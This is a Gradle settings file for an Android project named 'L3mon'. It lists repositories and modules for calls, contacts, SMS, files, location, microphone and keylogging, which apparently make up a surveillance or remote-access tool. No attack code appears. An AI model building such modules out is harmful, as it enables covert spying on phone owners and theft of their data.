pluginManagement {
    repositories {
        gradlePluginPortal()
        google()
        mavenCentral()
    }
}
dependencyResolutionManagement {
    repositoriesMode.set(RepositoriesMode.FAIL_ON_PROJECT_REPOS)
    repositories {
        google()
        mavenCentral()
    }
}

rootProject.name = "L3mon"
include ':app'

//Common Library
include ':CommonInterfaces'

//Modules
include ':CallsManager'
include ':ContactsManager'
include ':SMSManager'
include ':FileManager'
include ':LocManager'
include ':MicManager'
include ':KeyLoggerManager'
